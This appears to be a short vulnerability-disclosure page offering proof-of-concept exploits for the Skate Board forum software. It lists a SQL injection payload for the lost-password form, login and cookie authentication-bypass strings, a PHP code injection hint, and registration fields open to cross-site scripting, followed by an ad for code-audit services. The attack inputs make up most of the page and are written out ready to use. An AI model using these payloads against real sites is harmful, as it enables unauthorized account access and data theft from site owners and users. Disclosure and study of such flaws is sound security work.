PoC/Exploit for Multiple Vulnerabilities in Skate Board

Published Proof of Concept code - Multiple Vulnerabilities in Skate Board.

Description
Available
Solution
Not available - check vendor's website

1. SQL Injection Example

Url: http://[host]/index.php?act=lostpass

Username: aaa' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

2. Authentication Bypass.

a) From login form:

username: [username]' and 1/*

password: any

b) Cookie value

Cookie: sf_cookie=admin%27+and+1%2F%2A%3Basd

3. PHP Code Injection Example.

Min user chars is: 3; [code]

4. Multiple Cross-Site Scripting.

url: http://[host]/index.php?act=register

username: [XSS]

Full Name: [XSS]

Location: [XSS]

ICQ: [XSS]

Yahoo: [XSS]

Order Source Code Analysis

Prevent attacks by source code testing of your site or web application made by Aliaksandr Hartsuyeu.The work will be done by experts in web security.

Advisories by vuln type